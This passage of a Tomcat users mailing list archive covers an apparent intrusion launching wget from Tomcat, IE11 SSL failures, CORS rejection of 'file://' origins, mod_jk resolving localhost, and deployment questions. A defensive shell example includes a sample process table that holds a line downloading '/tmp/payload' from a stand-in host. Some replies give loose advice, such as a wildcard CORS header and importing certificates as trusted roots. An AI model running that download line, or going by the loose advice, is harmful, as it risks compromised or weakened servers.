  Yes: please verify that it's the JVM running Tomcat, and not just any
  JVM process.
 
   Take a thread dump:
  
  https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
  
It shall show what is stacktrace in thread that launched external
   process.
 
  +1
 
  The only things that ship with Tomcat that call Process.exec() are the
  CGI servlet and SSI, both of which are disabled by default. So, either
  you have an insecure CGI/SSI configuration, your web application has a
  vulnerability, or you have deployed something like the Manager
  application and improperly-secured it.
 
  A classic example of such an intrusion might be that someone got a
  foothold elsewhere into your network, and the Manager web application
  is not properly 
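
One way to do the check asked for above (that the `sh`/`wget` pair really descends from the Tomcat JVM and not some other java process) and to take a single thread dump per new child rather than one every three seconds. This is an added example, not code from anyone on the thread: the process table in it is constructed, `sample_ps`, `jvm_parents` and `watch_and_dump` are names invented here, and the Tomcat JVM is assumed to be recognisable by `org.apache.catalina.startup.Bootstrap` in its command line.

```sh
#!/bin/sh
# Added example (not from the thread): attribute a suspicious child process
# to the JVM that spawned it and take ONE thread dump per new child.

# Constructed sample in `ps -eo pid,ppid,user,args` layout. PIDs 8882/8893 and
# /tmp/4.sh mirror the ps output quoted in the thread; the rest is invented.
sample_ps() {
cat <<'EOF'
  PID  PPID USER     COMMAND
    1     0 root     init
 4321     1 tomcat   /usr/java/default/bin/java -Dcatalina.base=/opt/tomcat org.apache.catalina.startup.Bootstrap start
 5555     1 solr     /usr/java/default/bin/java -jar start.jar
 5600  5555 solr     wget http://192.0.2.20/index-update
 7000     1 root     /bin/bash
 8882  4321 tomcat   sh /tmp/4.sh
 8893  8882 tomcat   wget http://192.0.2.10/payload -O /tmp/payload
 9001  7000 root     wget http://127.0.0.1/health
EOF
}

# jvm_parents NAME: read a ps table on stdin; for every process whose
# executable basename is NAME, walk up the parent chain and print
#   <child pid> <jvm pid> <tomcat|other-jvm>
# for the first java ancestor. Children with no java ancestor (for example
# an administrator's interactive shell) print nothing.
jvm_parents() {
  awk -v child="$1" '
    $1 !~ /^[0-9]+$/ { next }                      # skip the header line
    {
      ppid[$1] = $2; exe[$1] = $4
      cmd = $4; for (i = 5; i <= NF; i++) cmd = cmd " " $i
      args[$1] = cmd
    }
    END {
      for (p in args) {
        n = split(exe[p], part, "/")
        if (part[n] != child) continue
        a = ppid[p]; hops = 0
        while ((a in args) && a + 0 > 1 && hops++ < 64) {
          m = split(exe[a], q, "/")
          if (q[m] == "java") {
            kind = (args[a] ~ /org\.apache\.catalina\.startup\.Bootstrap/) ? "tomcat" : "other-jvm"
            print p, a, kind
            break
          }
          a = ppid[a]
        }
      }
    }' | sort -n
}

# watch_and_dump NAME [INTERVAL]: poll the live process table and send
# SIGQUIT (kill -3) once per newly seen child, and only to the Tomcat JVM
# that is its ancestor. Other JVMs are logged but not signalled.
watch_and_dump() {
  name=$1; interval=${2:-1}; seen=" "
  while :; do
    hits=$(ps -eo pid,ppid,user,args | jvm_parents "$name")
    if [ -n "$hits" ]; then
      while read -r child jvm kind; do
        case "$seen" in *" $child "*) continue ;; esac
        seen="$seen$child "
        echo "$(date '+%F %T') $name pid=$child runs under $kind JVM pid=$jvm"
        if [ "$kind" = tomcat ]; then kill -3 "$jvm"; fi
      done <<EOF
$hits
EOF
    fi
    sleep "$interval"
  done
}

# Demo on the constructed table; pass --watch to poll the real one.
if [ "${1:-}" = "--watch" ]; then
  watch_and_dump wget 1
else
  sample_ps | jvm_parents wget
fi
```

Polling can still miss a child that lives for less than the interval. The dump goes to the JVM's standard output, which a stock Tomcat start script redirects to catalina.out.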

RE: Setup Issue tomcat 6 SLES 11 SSL

2014-04-30 Thread Martin Gainty
 Date: Wed, 30 Apr 2014 14:01:11 -0500
 From: tere...@tmbsw.com
 To: users@tomcat.apache.org
 Subject: Re: Setup Issue tomcat 6 SLES 11 SSL
 
 On 4/30/2014 9:02 AM, Christopher Schultz wrote:
  Vincent,
 
  On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:
  I have setup tomcat 6 on SLES 11 and secured the instance with an
  external certificate if authority.  The following is occurring
  from the same machine using both IE and Firefox:
 
  http://servername.wooster.edu:8080  works for both IE11 and
  Firefox 29 and displays the index.html
 
  https://servername.wooster.edu:8443  works for Firefox 29 and
  displays the index.html
 
  https://servername.wooster.edu:8443  does not work for IE11v
  displays This page can't be displayed
 
  I have changed the logging level to finest and do not see any
  errors in the catalina.out.
 
  Thoughts?  I have the same setup on another server and I believe
  the files and permission levels are set the same.
  What does your SSL configuration look like?
 
  You could also use either sslscan from the CLI or go to
  https://www.ssllabs.com/ssltest/ and use their online tool to examine
  the site from the outside.
 
  Perhaps you have a combination of protocols and ciphers that MSIE
  can't handle.
 
  - -chris
 
 
 If the option is available, you might also try disabling the IE 
 friendly error messages.  I'm not sure about IE 11, but it seems like 
 previous versions displayed an error message with a reddish background 
 if they were unable to authenticate a server with a given SSL 
 certificate.  Was a certificate authority bundle supplied with the SSL 
 certificate?  If so, is it installed and configured?  Were the SSL 
 certificates on the both servers issued by the same company?
 
 -Terence Bandoian
 
MG> IE / Internet Options / Tools / Content / Certificates / Import
MG> Import the provided certificate into CA Trusted Root

 
  

RE: CORS issue with Tomcat and Android Webview

2014-04-26 Thread Martin Gainty
 Date: Sat, 26 Apr 2014 11:43:05 +0530
 Subject: Re: CORS issue with Tomcat and Android Webview
 From: ankising...@gmail.com
 To: users@tomcat.apache.org
 
 On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian 
 tere...@tmbsw.com wrote:
 
  On 4/24/2014 11:16 PM, Ankit Singhal wrote:
 
  Hi
 
  I did more research on this and figured out the issue. If you see the
  headers from Android and look into Origin Header.
 
  Origin: file://
 
  Tomcat CORS filter tries to validate the URI in Origin header and considers
  file:// as an invalid URI and returns back 403.
 
  I have applied <accept-origin>*</accept-origin> params. So shouldn't CORS
  filter honor this ?
 
  I agree that Client also has the problem, but still server should also
  allow...
 
 
 
  Hi, Ankit-
 
  Have you tried disabling or removing the CORS filter when you're testing
  from the Android device? The flowchart in the Tomcat CORS documentation
  indicates that the filter will attempt to validate the origin before it
  determines whether or not it is allowed. Apparently, the file scheme is not
  considered valid.

MG> referencing the request processing flowchart at
MG> https://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png
MG> you will need to carefully shepherd your request thru TC Valve/Filter/ServletProcessing gauntlet
MG> did you supply a valid origin header?
MG> http://en.wikipedia.org/wiki/List_of_HTTP_header_fields
MG> did you supply a valid request method e.g. POST/GET?
MG> Android is a much different User-agent than Browser and you will need to set the request headers properly
MG> HttpConnection httpConn = null;
try {
  // Open an HTTP Connection object
  httpConn = (HttpConnection) Connector.open("http://LOCALHOST:8080/services/getdata");
  // Setup HTTP Request to POST
  httpConn.setRequestMethod(HttpConnection.POST);
  httpConn.setRequestProperty("User-Agent", "???");
http://www.useragentstring.com/pages/Mobile%20Browserlist/
MG>

  Hope that helps.
 
  -Terence Bandoian
 
 
 
 
 
  On Fri, Apr 25, 2014 at 1:36 AM, Terence M. Bandoian tere...@tmbsw.com
  wrote:
 
  On 4/24/2014 1:14 PM, Jose María Zaragoza wrote:
 
  2014-04-24 19:00 GMT+02:00 Terence M. Bandoian tere...@tmbsw.com:
 
  On 4/22/2014 1:37 PM, Jose María Zaragoza wrote:
 
  -- Forwarded message --
  From: Terence M. Bandoian tere...@tmbsw.com
  Date: 2014-04-22 20:12 GMT+02:00
  Subject: Re: CORS issue with Tomcat and Android Webview
  To: Tomcat Users List users@tomcat.apache.org
 
 
  On 4/22/2014 11:03 AM, Ankit Singhal wrote:
 
  Also we tried to give the same call from Android App to some
  different
  Node
  server and things worked fine. So it seems some problem with Tomcat
  only.
 
  A silly question:
 
  What does it have to do Tomcat's CORS support with W3C Widget Access
  specification ?
 
  I have no idea about Phonegap but it looks like that it prefers to
  follow that specification for managing requests to different domains ,
  right ?
 
 
  Hi, Jose-
 
  The request/response headers in the original post were difficult for me
  to
  follow but basically, requests to Tomcat are successful when tested
  with
  Chrome (desktop? laptop? server? same as Tomcat?) and unsuccessful when
  tested from an Android device. What are the differences between the two
  environments? Do those differences have any effect on request
  processing
  by
  the Tomcat CORS filter? If it were me, I'd find out.
 
  Well , I have no idea, but according this page
 
  http://www.html5rocks.com/en/tutorials/cors/
 
  if Content-Type is application/json , then request is a not simple
  request ( sic. ) and it requires a OPTIONS preflight request (
  including Origin header)
  And Once the preflight request gives permissions, the browser makes
  the actual request
 
  First case (Chrome browser) did but, but the second didn't
 
  Are you test to change the Content-Type ?
 
  Regards
 
 
  Hi, Jose-
 
  From the page you cited:
 
  The use-case for CORS is simple. Imagine the site alice.com has some
  data that the site bob.com wants to access. This type of request
  traditionally wouldn’t be allowed under the browser’s same origin policy.
  However, by supporting CORS requests, alice.com can add a few special
  response headers that allows bob.com to access the data.
 
  In this case, alice.com would be the server that hosts Tomcat. As you
  suggest, the problem may very well be in the client but - FOR ME - it's
  worth the effort to understand what should happen on both the client and
  the server and to ensure that both are configured correctly.
 
  -Terence Bandoian
 
 
 
 
  On Tue, Apr 22, 2014 at 9:22 PM, Ankit Singhal
 
  ankising...@gmail.com wrote:
 
  Hi All
 
 
 
  I am facing a strange problem with Tomcat 8 and CORS. I am
  developing
  a
  Hybrid web app using ionicframework, AngularJS, Cordova as front end
  and
  Tomcat 8 and Spring 3 as back-end.
 
 
 
  For easy development I am testing the 

RE: CORS issue with Tomcat and Android Webview

2014-04-26 Thread Martin Gainty


  


 From: demablo...@gmail.com
 Date: Sat, 26 Apr 2014 13:56:43 +0200
 Subject: Re: CORS issue with Tomcat and Android Webview
 To: users@tomcat.apache.org
 
 2014-04-26 13:16 GMT+02:00 Martin Gainty mgai...@hotmail.com:
  Date: Sat, 26 Apr 2014 11:43:05 +0530
  Subject: Re: CORS issue with Tomcat and Android Webview
  From: ankising...@gmail.com
  To: users@tomcat.apache.org
 
  On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian tere...@tmbsw.com wrote:
 
   On 4/24/2014 11:16 PM, Ankit Singhal wrote:
  
   Hi
  
   I did more research on this and figured out the issue. If you see the
   headers from Android and look into Origin Header.
  
   Origin: file://
  
   Tomcat CORS filter tries to validate the URI in Origin header and
   considers file:// as an invalid URI and returns back 403.
  
   I have applied accept-origin*/accept-origin params. So shouldn't
   CORS filter honor this ?
  
   I agree that Client also has the problem, but still server should also
   allow...
  
 
 Hi:
 
 I'm watching this flowchart
 https://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png
 
 and I wonder if Tomcat 7 checks if the request received belongs to the
 right type.
 I mean, if browser sends a simple request ( eg. POST + application/xml
 content-type header )
 W3C spec says that request should be a preflight request , does
 Tomcat check this case ?
 
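MG> you will need to set the Access-Allow-Origin to * and Content-Type to application/xml
public void doPost(HttpServletRequest req, HttpServletResponse resp) throws IOException {
  // CORS response header; "*" lets any origin read the response
  resp.addHeader("Access-Control-Allow-Origin", "*");
  resp.addHeader("Content-Type", "application/xml");
  // csvString holds the response body and is defined elsewhere in the servlet
  resp.getWriter().append(csvString);
}
MG>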
 
 
 Regards
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
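
The validate-then-authorize order discussed in this thread (the Origin header is checked for validity before the allowed-origins setting is consulted), as an added example that is not code from the thread or from Tomcat's source. It assumes the server parses the Origin value with java.net.URI; the class name, the allow-list entry and the sample origins are constructed. It also contrasts the "*" response header with echoing back only an allow-listed origin.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.Set;

/** Hypothetical helper: validate-then-authorize handling of the Origin header. */
public class OriginCheck {

    enum Decision { NOT_CORS, INVALID_ORIGIN, NOT_ALLOWED, ALLOWED }

    /** Syntax check only. Assumption: the Origin value is parsed with java.net.URI. */
    static boolean isWellFormed(String origin) {
        try {
            URI u = new URI(origin);
            return u.getScheme() != null;
        } catch (URISyntaxException e) {
            // "file://" ends up here: "//" followed by neither an authority
            // nor a path is rejected by the java.net.URI parser.
            return false;
        }
    }

    /**
     * Validation runs before the allow-list lookup, so a malformed Origin is
     * refused even when the policy is "allow any origin" (anyOrigin == true).
     */
    static Decision decide(String origin, boolean anyOrigin, Set<String> allowed) {
        if (origin == null) {
            return Decision.NOT_CORS;          // no Origin header: not a CORS request
        }
        if (!isWellFormed(origin)) {
            return Decision.INVALID_ORIGIN;    // the case that surfaces as a 403
        }
        if (anyOrigin || allowed.contains(origin)) {
            return Decision.ALLOWED;
        }
        return Decision.NOT_ALLOWED;
    }

    /** Response headers for an allowed request: wildcard policy vs. explicit allow-list. */
    static Map<String, String> corsHeaders(String origin, boolean anyOrigin) {
        Map<String, String> h = new LinkedHashMap<String, String>();
        if (anyOrigin) {
            h.put("Access-Control-Allow-Origin", "*");    // any site may read the response
        } else {
            h.put("Access-Control-Allow-Origin", origin); // echo only the vetted origin
            h.put("Vary", "Origin");                      // keep caches from mixing origins
        }
        return h;
    }

    public static void main(String[] args) {
        // Constructed sample values, not taken from the thread's request logs.
        Set<String> allowList =
                new HashSet<String>(Arrays.asList("https://app.example.com"));
        String[] origins = {
            "https://app.example.com", "https://other.example.net", "file://", null
        };
        for (String o : origins) {
            Decision open = decide(o, true, Collections.<String>emptySet());
            Decision strict = decide(o, false, allowList);
            System.out.println(o + " | allow-any: " + open + " | allow-list: " + strict);
            if (strict == Decision.ALLOWED) {
                System.out.println("  " + corsHeaders(o, false));
            }
        }
    }
}
```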
 
  

RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

2014-04-05 Thread Martin Gainty
  


 Date: Sat, 5 Apr 2014 06:57:23 -0400
 From: dcker...@verizon.net
 To: users@tomcat.apache.org
 Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work
 
 ...
 
  but if the server is a *nix implementation, the better diag tool
  might be dig. And yes, I would not expect the address 0.0.0.0
  on a client to connect to the localhost. That is a special
  case address meaning local network. If anything, it would be
  sending packets out the NIC card, not via loopback.
  0.0.0.0 means all IPv4 interfaces available and only applies
  for binding a server socket. You can never connect to 0.0.0.0
  as a client.
 
  Chris - It actually has a different meaning based on use. For
  binding to a socket in the local IP stack, it means what you
  say. In the routing table, it means the default route. In
  firewalls/routers, it probably means something completely
  different. When used as a destination address, it means what I
  said. How the IP stack/hardware deals with it is dependent on
  the implementation. The RFCs specify that it should be treated
  the same as the broadcast address, but local network only, and
  not routable. That may be for received packets only, as I've
  seen other references that it should never be used on-the-wire,
  unless as the source address in protocols like DHCP. In any
  event, definitely not expect the 0.0.0.0. address to get any
  response, either local host or otherwise. For the OP's specific
  problem, s/he need to see how localhost is resolving. Most
  systems define it in the local hosts file, either /etc/hosts
  (*nix) or c:\Windows\system32\etc\hosts. Not sure for other
  systems. Jeff
  Make that C:\Windows\system32\drivers\etc\hosts.
 
  I did a test and it appeared that ping didn't rely on the entry
  being there, but it could have been a cached result.
  Way back in the day when I had the misfortune to use Windows regularly
  for stuff like this, I seem to recall that almost nothing short of a
  reboot would cause the hosts file to be re-read.
 
  - -chris
 
 
  If I remember correctly, the Windows resolver cache may be cleared from
  a command prompt with ipconfig and that should include entries from the
  hosts file. Seems like I may have had to restart the browser though to
  see any changes to the hosts file.
 
 ipconfig /flushdns

MG>
ipconfig /flushdns *should* flush the IPs and the DNS entries.
To test, use a browser that doesn't cache DNS entries (like Firefox): go to the address bar

about:config
network.dnsCacheExpirationGracePeriod

http://kb.mozillazine.org/Network.dnsCacheExpiration

hth,
Martin
MG>
 
 
  

RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

2014-04-04 Thread Martin Gainty

 From: jeffrey.jan...@polydyne.com
 To: users@tomcat.apache.org
 Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work
 Date: Fri, 4 Apr 2014 17:33:08 +
 
  -Original Message-
  From: Jeffrey Janner [mailto:jeffrey.jan...@polydyne.com]
  Sent: Friday, April 04, 2014 12:10 PM
  To: 'Tomcat Users List'
  Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does
  not work
  
   -Original Message-
   From: Jeffrey Janner [mailto:jeffrey.jan...@polydyne.com]
   Sent: Friday, April 04, 2014 12:04 PM
   To: 'Tomcat Users List'
   Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does
   not work
  
-Original Message-
From: Christopher Schultz [mailto:ch...@christopherschultz.net]
Sent: Friday, April 04, 2014 10:23 AM
To: Tomcat Users List
Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis
does not work
   
   
Jeffrey,
   
On 4/4/14, 10:50 AM, Jeffrey Janner wrote:
 -Original Message- From: André Warnier [mailto:aw@ice-
sa.com]
 Sent: Thursday, April 03, 2014 5:27 PM To:
 Tomcat Users List Subject: Re: AW: AW:
 tomcat-connectors-1.2.39-windows-x86_64-iis does not work

 Christopher Schultz wrote:

 André,

 On 4/3/14, 3:34 PM, André Warnier wrote:
 Alten, Jessica-Aileen wrote:
 -Original Message- From: André Warnier
 [mailto:a...@ice-sa.com] Sent: Thursday, 3 April
 2014 15:36 To: Tomcat Users List Subject: Re: AW:
 tomcat-connectors-1.2.39-windows-x86_64-iis does not work

 Alten, Jessica-Aileen wrote:
 A bit guessing here :

 You have :
 worker.ajp13w.host=localhost
 and

 jk_open_socket::jk_connect.c (735): connect to 0.0.0.0:8009 failed (errno=49)
 is localhost == 0.0.0.0  ?

 From the point of view of mod_jk/isapi, should it not be
 127.0.0.1 ?
 Your answer points to the right direction. 0.0.0.0
 means: any configured IPv4-Address on this computer, see

 http://serverfault.com/questions/78048/whats-the-difference-between-ip-address-0-0-0-0-and-127-0-0-1

 In principle this is ok at first. The Ajp13 Connector was
 configured in server.xml to listen at any IPv4 address on port
 8009 - which is the default setting.
 But the connector can't find any suitable address.
 The problem is: The new Tomcat-Connector can't parse
 worker.ajp13w.host=localhost, instead localhost must be
 replaced with 127.0.0.1, this works!

 In my eyes this is a big fat bug, because most documentation
 on workers use localhost. localhost is actually the
 default for the host connection directive.

 The new worker directive prefer_ipv6 doesn't change this
 behavior.

 Hi.

 Can you please really check this ?

 Open a command window on that server, and do ping localhost.
 It should tell you what it understands by localhost. Copy and
 paste the result here :
 ping localhost

 Ping wird ausgeführt für xyz.uv.local [127.0.0.1] mit 32 Bytes Daten:
 Antwort von 127.0.0.1: Bytes=32 Zeit<1ms TTL=128
 Antwort von 127.0.0.1: Bytes=32 Zeit<1ms TTL=128
 Antwort von 127.0.0.1: Bytes=32 Zeit<1ms TTL=128
 Antwort von 127.0.0.1: Bytes=32 Zeit<1ms TTL=128

 Ping-Statistik für 127.0.0.1:
 Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0 (0% Verlust),
 Ca. Zeitangaben in Millisek.:
 Minimum = 0ms, Maximum = 0ms, Mittelwert = 0ms


 That /is/ bizarre.  As far as I know, to resolve hostnames in its
 configuration, mod_jk/isapi is using the OS's resolver library, the
 same as the one ping should be using. On the other hand, you
 say that if you have

 worker.ajp13w.host=localhost
 it doesn't work (mod_jk cannot connect to tomcat), but when you
 change this to

 worker.ajp13w.host=127.0.0.1
 then it works fine.

 Ok, another check in a command window (and I assume that you open
 this command window *on the server itself* where mod_jk and
 Tomcat are running, right ?)

 test :

 1) telnet localhost 8009

 2) telnet 127.0.0.1 8009

 Any difference between these 2 cases ?

 If not, then indeed it looks like a mod_jk/isapi_redirect
 1.2.39 problem.

 In any case, you cannot connect to 0.0.0.0, as this log line
 would suggest :

 jk_open_socket::jk_connect.c (735): connect to 0.0.0.0:8009 failed

 Could this be an interaction between IPv4 and IPv6? Try:

 C: nslookup localhost

 You might get only 127.0.0.1 or you might also get :: (or
 something equivalent). 

RE: How to deploy Java application into Tomcat in Linux

2014-04-01 Thread Martin Gainty


  


 From: randhir.si...@sterlite.com
 Date: Tue, 1 Apr 2014 10:43:28 +0530
 Subject: How to deploy Java application into Tomcat in Linux
 To: users@tomcat.apache.org
 
 Hi,
 
 
 
 As per my understanding, the steps to deploy a Java application on Tomcat
 (5.X/6.X) in Linux would be as follows:
 
 
 
 1) Install Tomcat on Linux
 
 2) Add a host entry in $TOMCAT_HOME/conf with the syntax like-
 
 -
 
 <Host name="xxx.co.in" debug="0"
 appBase="/opt/setuponm/jakarta-tomcat-5.0.28/sterlite/reportstool"
 unpackWARs="false" autoDeploy="false">

MG> Unfortunately that Host designation won't work.. try
MG> <Host name="www.tomcatexpert.com" appBase="webapps"
MG>       unpackWARs="true" autoDeploy="false">
MG>
 <Alias>reports.fion.co.in</Alias>

 <Context path=""
 docBase="/opt/setuponm/jakarta-tomcat-5.0.28/sterlite/reportstool" debug="0"
 reloadable="false" crossContext="false" />

 </Host>
 
 
 
 
 
 
 
 
 The above code would assign the host name to access the URL, gives the
 location of the web application pointed out by appBase  context path.
 
 
 
 3) Start Tomcat.
 
 
 
 Please let me know if the steps above are correct and also please let me
 know in detail if the steps are not correct.
 
 
 
 
 
  

RE: catalina-ant reload task doesn't work

2014-03-28 Thread Martin Gainty
$/CATALINA_HOME/conf/server.xml
autoDeploy=true

https://tomcat.apache.org/tomcat-6.0-doc/config/host.html

 

?
Martin

_


  



 Date: Fri, 28 Mar 2014 18:21:42 -0700
 Subject: catalina-ant reload task doesn't work
 From: catph...@catphive.net
 To: users@tomcat.apache.org
 
 Using the tasks from the example ant script at:
 http://tomcat.apache.org/tomcat-8.0-doc/appdev/build.xml.txt
 
 I can deploy and undeploy from ant. However, the reload task doesn't
 seem to do anything.
 
 I make changes to java and html files, run ant reload which triggers the
 reload task. Ant reports success. I browse to the site and my changes
 aren't reflected. undeploy followed by deploy works.
 
 Am I not understanding what reload is supposed to do, or is there a
 different task that makes more sense to use?
  

RE: NoClassDefFoundError using catalina ant deploy task

2014-03-28 Thread Martin Gainty
no bugs..just ...'undocumented features'


glad you found the solution!
Martin 
__

  



 Date: Fri, 28 Mar 2014 17:51:08 -0700
 Subject: Re: NoClassDefFoundError using catalina ant deploy task
 From: catph...@catphive.net
 To: users@tomcat.apache.org
 
 I investigated more and found the solution... It seems like a doc bug in
 that the tutorial doesn't tell you everything you need to do to get deploy
 to work.
 
 tomcat-util.jar needs to be placed in ~/.ant/lib. The tutorial says to
 place catalina-ant.jar there, but doesn't mention tomcat-util.jar.
 
 The user needs the manager-script role for deploy to succeed. The tutorial
 doesn't mention this.
 
 Overall the appdev tutorial is pretty problematic because it doesn't really
 include a complete example and seems to have kind of random organization.
 
 
 On Fri, Mar 28, 2014 at 4:41 PM, Brendan Miller catph...@catphive.net wrote:
 
  I was going through the tomcat docs and trying to use the default
  build.xml file provided by the appdev tutorial to deploy my war to tomcat.
 
  Example build.xml:
  http://tomcat.apache.org/tomcat-8.0-doc/appdev/build.xml.txt
 
  However, when I use the deploy task I always get
  a java.lang.NoClassDefFoundError:
  org/apache/tomcat/util/codec/binary/Base64 error.
 
  I've copied the relevant code here:
  https://gist.github.com/catphive/9845270
 
  I've verified that tomcat-util.jar, which contains Base64.class, is on the
  path, compile.classpath, passed to taskdef.
 
  I'm just trying to do a basic tomcat tutorial, and getting this deploy
  task to run is hanging me up. Any ideas what could be doing wrong? Are
  these deploy tasks broken somehow?
 
  Brendan
 
  

RE: SSO

2014-03-23 Thread Martin Gainty
When you say Linux I assume you are implementing Red Hat Enterprise Linux SSO


https://access.redhat.com/site/documentation/en-US/Red_Hat_Enterprise_Linux/5/html/Deployment_Guide/sso-ov.html


Martin 
__ 
Please do not alter or disrupt this email transmission...Thank You

  



 From: yossi.br...@sap.com
 To: users@tomcat.apache.org
 Subject: SSO
 Date: Sun, 23 Mar 2014 07:37:41 +
 
 
 Hi to all ,
 
 I am trying to install SSO on a Linux machine with Tomcat in order to work
 with Jenkins without needing to log in, any idea ?
 
 Thanks a lot ,
 Yos
 
  

RE: help with setting up proxy

2014-03-23 Thread Martin Gainty
  


 From: hardikvaish...@gmail.com
 Date: Sat, 22 Mar 2014 22:32:11 -0400
 Subject: Re: help with setting up proxy
 To: users@tomcat.apache.org
 
 Here is the example of what I am trying to do.
 
 JBoss Webserver Private IP : 192.168.10.100
 JBoss Webserver Public IP 172.x.x.x
 
 Server connected to Jboss: 192.168.10.101  192.168.10.102
 
 If I am on the Jboss machine I can access 192.168.10.101\abc\test.html
 If I am outside the network its not possible to access URL
 192.168.10.101\abc\test.html
 
 To solve the problem I have PAC file as a proxy for my browser which
 redirect all request for 192.168.10.101 address to apache httpd proxy
 server which sits inside the (192.168.x.x) network.
 
 Up to this point everything works OK. Request comes to Apache httpd server
 but it is not able to pass the url as is to 192.168.10.101\abc\test.html
 and return the response back to the client.

MG> 192.168.10.101 is only known to the machines obtaining their IP from that DHCP router
MG> The router dynamically assigns 192.168.x.x to that machine at that point in time
MG> No machine outside that router's network would ever know about those dynamic IPs
MG> This is a Network issue... please contact your Net Admin

 thanks,
 -Hardik
 
 
 On Sat, Mar 22, 2014 at 2:04 PM, Hardik Vaishnav
 hardikvaish...@gmail.com wrote:
 
  Sorry my bad. I am talking about Apache httpd server.
 
 
  On Mar 22, 2014 12:29 PM, Hassan Schroeder hassan.schroe...@gmail.com
  wrote:
 
  On Sat, Mar 22, 2014 at 9:18 AM, Hardik Vaishnav
  hardikvaish...@gmail.com wrote:
 
   I am trying to configure Apache Tomcat as a proxy server.
 
   I hope I am not confusing everybody.
 
  I think perhaps you are confusing yourself. Tomcat has no intrinsic
  proxy server capability to configure. Are you thinking of the Apache
  httpd server?
 
  --
  Hassan Schroeder  hassan.schroe...@gmail.com
  http://about.me/hassanschroeder
  twitter: @hassan
 
 
 
  

RE: Effects of turning off sendFile in the NIO connector

2014-03-23 Thread Martin Gainty


  


 Date: Sat, 22 Mar 2014 14:24:01 -0400
 Subject: Effects of turning off sendFile in the NIO connector
 From: tomcat.ran...@gmail.com
 To: users@tomcat.apache.org
 
 What effect would setting useSendfile=false have on a web application using
 the NIO connector? I'm asking because I may want to use gzip compression in
 the connector. The docs state:
 
 *There is a tradeoff between using compression (saving your bandwidth) and
 using the sendfile feature (saving your CPU cycles). If the connector
 supports the sendfile feature, e.g. the NIO connector, using sendfile will
 take precedence over compression. The symptoms will be that static files
 greater that 48 Kb will be sent uncompressed.*
 
 It's trivial that adding compression uses CPU cycles, but does that imply
 that turning sendFile off even without enabling compression would increase
 CPU cycles? It's worth mentioning that the site serves a large (8mg) SWF
 file. I believe that was one of the pluses of NIO/sendFile, that it was
 good with sending large files under heavy traffic?

MG> when you enable sendfile support with request attr org.apache.tomcat.sendfile.support = true
MG> You will need to set these 3 header attributes

org.apache.tomcat.sendfile.filename: Canonical filename of the file which will be sent as a String
org.apache.tomcat.sendfile.start: Start offset as a Long
org.apache.tomcat.sendfile.end: End offset as a Long
MG> https://tomcat.apache.org/tomcat-6.0-doc/aio.html

MG> Compression:
MG> set compression=on @ Connector
MG> https://tomcat.apache.org/tomcat-7.0-doc/config/http.html

MG> I did not read that TC cannot use sendfile with any compressed Stream?
MG> can you show us the URL?
MG> Thanks

 We also only really need compression on XML data, the site has minimal
 HTML, SWF's don't really benefit from gzip and some binary data we send
 back and forth is already compressed. I could manually implement
 compression on XML at the application level and within the SWF, if turning
 off sendFile will have negative consequences.
 
 Tomcat 7.0.42
 RHEL6
 ~4T outbound traffic/day
 
 Best,
 John
  

RE: jax-ws and tomcat 7 with ssl

2014-03-18 Thread Martin Gainty
i assume they copied OptionalPrefixcacerts $JAVA_HOME\jre\lib\security?


make sure validation dates are correct for Certificate
a self-signed cert is designed to work on the machine where you created the 
cert only *CN*
to implement a cert that will work on FQDN with correct dates you will need a 
REAL cert from verisign / thawte / DigiCert


Fixing PKIX Errors:

http://www.mkyong.com/webservices/jax-ws/suncertpathbuilderexception-unable-to-find-valid-certification-path-to-requested-target/

 

Making Self-Signed Certs

http://torlanglo.wordpress.com/2008/05/03/how-to-create-a-ssl-certificate-with-custom-domain-name-for-use-in-iis7-web-sites/

 

Get your 'REAL CERTS' here

http://safire.net/support/verisign.html


Martin 


  



 Date: Tue, 18 Mar 2014 17:58:32 -0400
 From: mariacristinasi...@sourcecable.net
 To: users@tomcat.apache.org
 Subject: jax-ws and tomcat 7 with ssl
 
 Hi,
 
 I developed a web service using jax-ws and configured Tomcat to support 
 SSL connection. Here are my steps:
 
 ** Step 1 - Generate a self-signed server certificate
 
 Use JDK 1.7 keytool:
 
 keytool -genkey -alias trackerdev -keypass changeit -storepass changeit
 -keystore D:\Tomcat7\htdkeystore\trackerdev.ks -ext san=ip:xx.x.x.xxx
 
 Is CN=xx.x.x.xxx, OU=it, O=companynamehere, L=citynamehere, 
 ST=provincenamehere, C=ca correct?
 [no]: yes
 
 ** Step 2 – Configure Tomcat to support SSL connection
 
 On the dev server:
 
 Modify TOMCAT_HOME\conf\server.xml by adding the following block where 
 keystoreFile and keystorePass are set to values from the previous step:
 
 <Connector port="8444" protocol="HTTP/1.1" SSLEnabled="true"
 maxThreads="150" scheme="https" secure="true" clientAuth="false"
 sslProtocol="TLS"
 keystoreFile="htdkeystore/trackerdev.ks"
 keystorePass="changeit" />
 
 ** Step 3 - Export the generated server certificate to a 
 certificate file
 
 On the dev server:
 
 keytool -export -alias trackerdev -storepass changeit -file
 D:\Tomcat7\htdkeystore\serverdev.cer -keystore
 D:\Tomcat7\htdkeystore\trackerdev.ks
 
 ** Step 4 - Import the server certificate into the truststore file 
 (Open an administrator cmd window and hit Shift, Ctrl, Enter)
 
 Copy serverdev.cer from the dev server and on the local machine:
 
 keytool -import -v -trustcacerts -alias trackerdev -file
 C:\fromdevserver\serverdev.cer -keystore
 "C:\Program Files\Java\jdk1.7.0_51\jre\lib\security\cacerts" -keypass changeit
 -storepass changeit
 
